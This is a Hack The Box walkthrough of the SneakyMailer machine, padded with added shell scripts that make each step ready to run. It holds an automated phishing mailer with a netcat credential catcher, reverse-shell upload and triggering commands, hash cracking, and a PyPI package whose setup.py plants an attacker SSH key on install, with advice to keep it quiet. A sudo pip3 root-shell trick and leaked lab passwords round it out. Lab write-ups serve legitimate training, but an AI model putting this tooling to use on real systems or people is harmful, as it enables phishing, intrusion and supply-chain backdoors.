SneakyMailer — HTB Walkthrough
What, another Sneaky HTB box? Maybe, but it was fun to solve: real-life phishing practice, and the user part was definitely a level up. Let's start.
ENUMERATION
A full TCP port scan with nmap reveals the following open ports (the ones used below are 21 FTP, 25 SMTP, 80 HTTP, IMAP and 8080).
PORT 21 FTP ENUMERATION
— — Anonymous login failed.
PORT 80 HTTP ENUMERATION
Visiting the website.
Add sneakycorp.htb to /etc/hosts.
We get three pieces of information:
— — pip install is used to install Python modules on the server
— — We have to read mails for further exploitation
— — We get usernames (and e-mail addresses) from the Teams and Messages pages
Viewing the page source, we can see the messages.
The Teams page lists the employees and their e-mail addresses.
Normal enumeration such as directory busting gave nothing of importance.
Dead ends:
1) HTTP gave me nothing (gobuster and friends).
2) SMTP user enumeration would only test a username list against the server to see which users exist, which is of little use because we already have the users from the HTTP site.
3) IMAP: to read mails I need to log in as some user, and I have no credentials yet.
4) FTP anonymous login failed :(
Now what? This box asks us to think like an attacker: e-mail harvesting followed by a phishing attempt. Since we have already harvested the e-mail addresses during the HTTP enumeration, we can try sending some phishing mails. Let's see how.
PORT 25 SMTP ENUMERATION
First, let's collect the e-mail addresses and the usernames into two separate lists.
EXPLOITATION
We will use swaks (available on GitHub) to send the mails. First start a netcat listener on port 80. Then send each user a phishing mail containing a link to our IP; if even a single one clicks it, we may get something juicy.
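The harvesting and mailing steps, as an added shell example that is not from the original write-up: it pulls the e-mail addresses out of a saved copy of the Teams page, derives a username list from them, and prints one swaks command per address so the run can be checked before anything is sent. The HTML is a constructed stand-in for the real page, and the sender address, SMTP host and listener URL (10.10.14.5) are assumptions.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough.
# Harvest e-mail addresses from a saved Teams page and phish each one with swaks.

# Print the unique, lower-cased e-mail addresses found in an HTML file.
harvest_emails() {
    grep -Eoi '[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,}' "$1" | tr 'A-Z' 'a-z' | sort -u
}

# Turn an address list into a username list (local parts only).
emails_to_users() {
    cut -d@ -f1 "$1" | sort -u
}

# Build the swaks invocation for one recipient. The command is printed, not
# run, so the whole thing can be dry-run; pipe the output to sh to send.
swaks_cmd() {
    to="$1" from="$2" server="$3" url="$4"
    printf 'swaks --to %s --from %s --server %s --header "Subject: Action required" --body "Please confirm your account at %s"\n' \
        "$to" "$from" "$server" "$url"
}

# One mail per harvested address.
phish_all() {
    emails="$1" from="$2" server="$3" url="$4"
    while IFS= read -r addr; do
        swaks_cmd "$addr" "$from" "$server" "$url"
    done < "$emails"
}

# Stand-alone demo on a constructed page (not the real Teams page).
work=$(mktemp -d)
cat > "$work/team.html" <<'EOF'
<table>
<tr><td>Paul</td><td><a href="mailto:paul@sneakycorp.htb">paul@sneakycorp.htb</a></td></tr>
<tr><td>Developer</td><td>developer@sneakycorp.htb</td></tr>
<tr><td>Paul (again)</td><td>Paul@sneakycorp.htb</td></tr>
</table>
EOF
harvest_emails "$work/team.html" > "$work/emails.txt"
emails_to_users "$work/emails.txt" > "$work/users.txt"
echo "addresses:"; cat "$work/emails.txt"
echo "users:";     cat "$work/users.txt"
# Start `nc -lvnp 80` first; the sender, SMTP host and URL below are assumptions.
phish_all "$work/emails.txt" support@sneakycorp.htb sneakycorp.htb http://10.10.14.5/
```

Duplicates that differ only in case are collapsed, so each mailbox gets exactly one mail; appending `| sh` to the last line sends them for real once the listener is up.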
On the netcat listener on port 80 we see that the user Paul followed the link and sent us his credentials:
Username : Paul && Password: ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht
I used the Evolution mail client on Kali to read the mails.
Set up Evolution with Paul's e-mail address and the password we just obtained, then read his mailbox.
Mails
Hello administrator, I want to change this password for the developer account. Username: developer && Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C; Please notify me when you do it
The other mail is about Python and PyPI.
The developer password from the first mail also works for FTP.
FTP ENUMERATION
Log in to FTP with the developer credentials.
Register.php
I initially thought of registering a user via a curl request, but we don't need to: it is a rabbit hole.
Then what? Can we upload files to the server with FTP put? I uploaded pentestmonkey's php-reverse-shell.
But where do we access it? Time for subdomain and directory busting. We have already busted directories, so let's look for subdomains.
Fuzzing subdomains with wfuzz gives dev.sneakycorp.htb, which serves the same content as the FTP share, so the uploaded shell can be requested from there to get a callback as www-data.
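The upload step, as an added shell example that is not from the original post: it sets the callback IP and port in pentestmonkey's php-reverse-shell (the two `// CHANGE THIS` lines, which are easy to forget before uploading), then prints the curl commands to push the file over FTP and request it on the dev vhost. The listener address 10.10.14.5:4444 is an assumption, the PHP stub is a constructed two-line stand-in for the real script, and the FTP root is assumed to be the vhost's document root because the page observes the same content in both.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough.
# Point php-reverse-shell at our listener, then upload it over FTP with curl.

# pentestmonkey's script ships with:
#   $ip = '127.0.0.1';  // CHANGE THIS
#   $port = 1234;       // CHANGE THIS
# Rewrite both values in place (a .bak copy is kept). The [$] class keeps the
# dollar sign literal for both sed and the shell.
set_callback() {
    file="$1" ip="$2" port="$3"
    sed -i.bak \
        -e "s/^[$]ip = '[^']*';/\$ip = '$ip';/" \
        -e "s/^[$]port = [0-9]*;/\$port = $port;/" "$file"
}

# Print (do not run) the upload and trigger commands. A file put in the FTP
# root is assumed to be reachable at the vhost root (assumption, see lead-in).
upload_and_trigger_cmds() {
    file="$1" user="$2" pass="$3" ftphost="$4" vhost="$5"
    printf "curl -T %s --user '%s:%s' ftp://%s/\n" "$file" "$user" "$pass" "$ftphost"
    printf 'curl -s http://%s/%s\n' "$vhost" "$(basename "$file")"
}

# Stand-alone demo on a constructed stub of the script.
work=$(mktemp -d)
printf "<?php\n\$ip = '127.0.0.1';  // CHANGE THIS\n\$port = 1234;       // CHANGE THIS\n" > "$work/shell.php"
set_callback "$work/shell.php" 10.10.14.5 4444      # listener address is an assumption
grep -n 'CHANGE THIS' "$work/shell.php"
# Run `nc -lvnp 4444` first, then execute the two printed lines (developer password from the mail).
upload_and_trigger_cmds "$work/shell.php" developer 'm^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C' sneakycorp.htb dev.sneakycorp.htb
```

The trailing slash on the ftp:// URL matters: without it curl tries to store the upload as a file named after the last path component instead of inside the directory.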
POST EXPLOITATION
Now that we are www-data, it's time to get a user shell.
Let's enumerate. We already know what is in dev.sneakycorp.htb (the same content we saw over FTP); pypi.sneakycorp.htb, however, is something new.
Username: pypi
Password hash: $apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/
The $apr1$ prefix marks an Apache htpasswd MD5 hash (not "april"); let's crack it with hashcat (mode 1600).
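Hash identification for the cracking step, as an added shell example that is not from the original write-up. It maps the `$prefix$` of a crypt-style hash to the hashcat mode, going a little beyond the page by covering the other common htpasswd and /etc/shadow formats, strips an `htpasswd`-style `user:` prefix if one is present, and only invokes hashcat when it and the wordlist exist. The `pypi:` prefix in the demo input is constructed from the username and hash above.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough.
# Pick the hashcat mode from a crypt-style hash prefix, then crack it.

hashcat_mode() {
    case "$1" in
        '$apr1$'*)                 echo 1600 ;;  # Apache htpasswd, MD5 (apr1)
        '$1$'*)                    echo 500  ;;  # md5crypt
        '$5$'*)                    echo 7400 ;;  # sha256crypt
        '$6$'*)                    echo 1800 ;;  # sha512crypt
        '$2a$'*|'$2b$'*|'$2y$'*)   echo 3200 ;;  # bcrypt
        *)                         return 1  ;;
    esac
}

# Strip an htpasswd-style "user:" prefix if present; hashcat wants the bare
# hash (alternatively keep the line and pass --username).
bare_hash() {
    printf '%s\n' "$1" | sed 's/^[^$:]*://'
}

crack() {
    hashfile="$1" wordlist="$2"
    mode=$(hashcat_mode "$(head -n 1 "$hashfile")") || { echo "unknown hash format" >&2; return 1; }
    echo "hashcat mode: $mode"
    if command -v hashcat >/dev/null 2>&1 && [ -f "$wordlist" ]; then
        hashcat -m "$mode" -a 0 "$hashfile" "$wordlist"
        hashcat -m "$mode" "$hashfile" --show
    else
        echo "would run: hashcat -m $mode -a 0 $hashfile $wordlist"
    fi
}

# Stand-alone demo with the hash from the box.
work=$(mktemp -d)
bare_hash 'pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/' > "$work/pypi.hash"
crack "$work/pypi.hash" /usr/share/wordlists/rockyou.txt
```

Getting the mode right matters more than it looks: hashcat will happily reject every line of a wordlist against the wrong algorithm and report "exhausted", which reads like a weak wordlist rather than a wrong mode.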
Let's see what is happening on port 8080, which was open.
There are lots of connections to localhost:8080, and on visiting pypi.sneakycorp.htb:8080/ I see a private PyPI-style package index.
When I try to access /packages, it asks me to authenticate as user pypi.
Let's use the credentials we just cracked.
There are no packages there; the same goes for /simple.
https://packaging.python.org/tutorials/packaging-projects/#generating-distribution-archives
Let's create a package in the /tmp directory.
nano and vi did not work in the web shell, so I made the files on my own machine and fetched them with wget.
First create an SSH key pair: the package will drop our public key into low's authorized_keys when the server pip-installs it, so we can then SSH in as low with the private key.
Wget all the files under sample_package. The layout must look like this:
— — README.md and setup.cfg
— — setup.py and sample_package/__init__.py
Now that our package is ready, we need to deploy it to the index.
1) Build a source distribution with sdist.
2) Create a .pypirc in the HOME folder with the repository URL and the pypi credentials.
For this, first export HOME=/tmp/sample_package (a .pypirc is only read from the user's home folder), then wget the file like the previous ones and upload the package.
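The package build and .pypirc steps above, as an added shell example that is not the author's own files: it writes the four files of sample_package, with a setup.py that appends our SSH public key to low's authorized_keys whenever pip installs the package, plus a .pypirc pointing at the private index, and prints the upload commands. The target home directory /home/low, the index URL http://pypi.sneakycorp.htb:8080, the use of `setup.py sdist upload` (twine shown as the alternative) and the placeholder key and password are assumptions.

```shell
#!/bin/sh
# Added example, not the author's files.
# Build sample_package with a setup.py that drops our SSH key when pip installs it,
# write a .pypirc for the private index, and show the upload commands.

# Layout: README.md, setup.cfg, setup.py, sample_package/__init__.py.
# setup.py runs with the privileges of whoever pip-installs the package; on this
# box that is low, so the key lands in low's authorized_keys (path assumed).
make_package() {
    dir="$1" pubkey="$2" target_home="$3"
    mkdir -p "$dir/sample_package"
    : > "$dir/sample_package/__init__.py"
    printf '# sample_package\n' > "$dir/README.md"
    printf '[metadata]\ndescription_file = README.md\n' > "$dir/setup.cfg"
    cat > "$dir/setup.py" <<EOF
import os
import setuptools

KEY = "$pubkey"
SSH_DIR = "$target_home/.ssh"

# Install-time hook: append the key, but never let a failure break the install.
try:
    os.makedirs(SSH_DIR, mode=0o700, exist_ok=True)
    with open(os.path.join(SSH_DIR, "authorized_keys"), "a") as fh:
        fh.write(KEY + "\\n")
    os.chmod(os.path.join(SSH_DIR, "authorized_keys"), 0o600)
except Exception:
    pass

setuptools.setup(
    name="sample_package",
    version="0.0.1",
    packages=setuptools.find_packages(),
)
EOF
}

# .pypirc is only read from $HOME, so HOME is pointed at the package directory
# on the box, as the write-up does.
make_pypirc() {
    home="$1" url="$2" user="$3" pass="$4"
    cat > "$home/.pypirc" <<EOF
[distutils]
index-servers =
    local

[local]
repository: $url
username: $user
password: $pass
EOF
    chmod 600 "$home/.pypirc"
}

# Stand-alone demo. The key is a placeholder: paste the .pub you generated.
work=$(mktemp -d)
make_package "$work" "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAI_REPLACE_ME kali" /home/low
make_pypirc "$work" http://pypi.sneakycorp.htb:8080 pypi 'REPLACE_WITH_CRACKED_PASSWORD'
find "$work" -type f | sort
cat <<EOF
# On the box, from the web shell:
cd $work && export HOME=$work
python3 setup.py sdist upload -r local          # older setuptools
# or: python3 setup.py sdist && twine upload -r local dist/*
# afterwards: ssh -i id_ed25519 low@<target>
EOF
```

The try/except around the hook is deliberate: if the key drop raises, pip aborts the install with a traceback, which is both noisy and leaves nothing behind; swallowing the error keeps the package looking like a normal (if pointless) module.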
Once the server has installed our package, our public key has been added to low's home directory.
SSH into the box as low.
PRIVILEGE ESCALATION
The easiest part of the whole machine was escalating privileges.
We can exploit sudo on pip using the GTFOBins entry.
After thinking about it for a while, I saw that sudo lets us run pip3, not pip.
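The sudo check and the GTFOBins pip trick, as an added shell example that is not from the original: it parses `sudo -l` output for binaries runnable as root without a password (so pip3 versus pip is settled by reading the output rather than guessing) and, for pip3 or pip, spawns a root shell through a throwaway package whose one-line setup.py execs /bin/sh. The `sudo -l` text is constructed and the hostname in it is an assumption.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough.
# Find what sudo allows, then abuse pip3 the GTFOBins way.

# Print the binaries that `(root) NOPASSWD:` lines in `sudo -l` output permit.
nopasswd_root_bins() {
    awk '/\(root\).*NOPASSWD:/ {
            sub(/.*NOPASSWD:[ \t]*/, "")
            n = split($0, cmds, /,[ \t]*/)
            for (i = 1; i <= n; i++) { split(cmds[i], parts, /[ \t]+/); print parts[1] }
        }' "$1"
}

# `sudo pip install <dir>` runs <dir>/setup.py as root, so a one-line setup.py
# that execs a shell is enough. $(tty) is expanded at run time on the box.
pip_root_shell() {
    pip="$1"
    TF=$(mktemp -d)
    echo 'import os; os.execl("/bin/sh", "sh", "-c", "sh <$(tty) >$(tty) 2>$(tty)")' > "$TF/setup.py"
    sudo "$pip" install "$TF"
}

# Stand-alone demo on constructed `sudo -l` output (hostname assumed).
work=$(mktemp -d)
cat > "$work/sudo-l.txt" <<'EOF'
Matching Defaults entries for low on sneakymailer:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User low may run the following commands on sneakymailer:
    (root) NOPASSWD: /usr/bin/pip3
EOF
for bin in $(nopasswd_root_bins "$work/sudo-l.txt"); do
    case "$(basename "$bin")" in
        pip|pip3) echo "sudo allows $bin -> run: pip_root_shell $bin" ;;
        *)        echo "sudo allows $bin -> check GTFOBins" ;;
    esac
done
```

Call `pip_root_shell /usr/bin/pip3` with the full path that sudo lists; using the bare name `pip` when only `/usr/bin/pip3` is permitted is exactly the mismatch that cost time above.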
ROOTED!!!